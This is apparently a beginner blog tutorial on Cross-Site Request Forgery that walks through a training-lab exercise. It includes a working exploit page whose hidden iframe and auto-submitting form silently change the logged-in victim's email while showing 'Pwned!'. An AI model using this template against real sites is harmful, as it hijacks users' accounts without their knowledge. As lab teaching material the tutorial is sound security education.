Cross-Site Request Forgery (CSRF) is an attack that induces a user who is currently logged in to a web application to perform unwanted actions. An attacker can perform social engineering to persuade users of a web application to carry out their desired actions (for example, by sending a link via email or chat). If the victim is a regular user, a successful CSRF attack can force them to carry out state-changing operations like money transfers, email address changes, and other similar tasks. The entire web application may be compromised by CSRF if the victim is an administrative account.
How does CSRF attack works?
Synopsys has done a great job conveying the example of how the Cross-Site Request Forgery attack works, for preventing CSRF check out this OWASP cheatsheet.
Bug Bounty
It’s difficult to understand why CSRF is still so common, there are many protections that can be implemented easily both at an application level and at a server level. Although, they are still being found every day, and are often quite severe. Around 5 months ago, a security researcher was awarded $10,000 for a bug, he reported for Github.
Practical Labs
Before we start I want to clear some important things you’ll see scripting here and as a beginner, it’ll scare you, but you don’t have to worry about that, there are lots of professionals who don’t know how to code but are very much good at their job, but, you do need to clear some concepts of how the code in web application works only then you’ll be able to identify the vulnerability much easier and faster than others, all the payloads are available online, you don’t need to learn JavaScript as the web development pathway, but just to clear some concepts, because that’s where we find the vulnerabilities, I would recommend FreeCodeCamp.
This lab is very much important when it comes to understanding CSRF, once you get the concept of this you’ll be able to solve the other labs. Let’s get started.
This lab’s email change functionality is vulnerable to CSRF.
To solve the lab, craft some HTML that uses a CSRF attack to change the viewer’s email address and upload it to your exploit server.
You can log in to your own account using the following credentials: wiener:peter
After logging in with credentials on “my account” page,
Just to see what happens behind the scenes, we’ll use Burp Suite to intercept traffic when we update email, i’ll be using firefox developer tools:
use the following HTML template and fill in the request’s method,URL, body parameters, which will trick the user in showing “Pwned!” but will be changing his email in background,
<html>
<body>
<h1>Pwned!</h1>
<iframe style="display:none" name="csrf-iframe"></iframe>
<form action="https://0a7e00bc03fe2d48c09f4d1200b800cb.web-security-academy.net/my-account/change-email" method="POST" target="csrf-iframe" id="csrf-form">
<input type="hidden" name="email" value="darth@test.com">
</form>
<script>document.getElementById("csrf-form").submit()</script>
</body>
</html>
Go to the exploit server, paste your exploit HTML into the “Body” section, and click “Store”. To verify that the exploit works, try it on yourself by clicking “View exploit” and then check the resulting HTTP request and response. Click “Deliver to victim” to solve the lab.
Conclusion
we’ve covered the basic theoretical and practical knowledge to understand What Cross-site request forgery vulnerability is and how to exploit it hands-on. If you’re interested in cross-site attacks check out my blog on XSS, we only covered the basic practical labs and the remaining of them are for you to practice and get more familiar with it and learn your own way through it, you will find video solutions of the labs under the “community solutions” section, and you can also find the writeups for them, but if you’re having any problem with anything feel free to contact me I’ll reply asap. So today’s topic is done here hope you guys liked it and learn something new from it, I will appreciate the support from you guys. Thanks for reading, and see you on the next topic.
Top comments (0)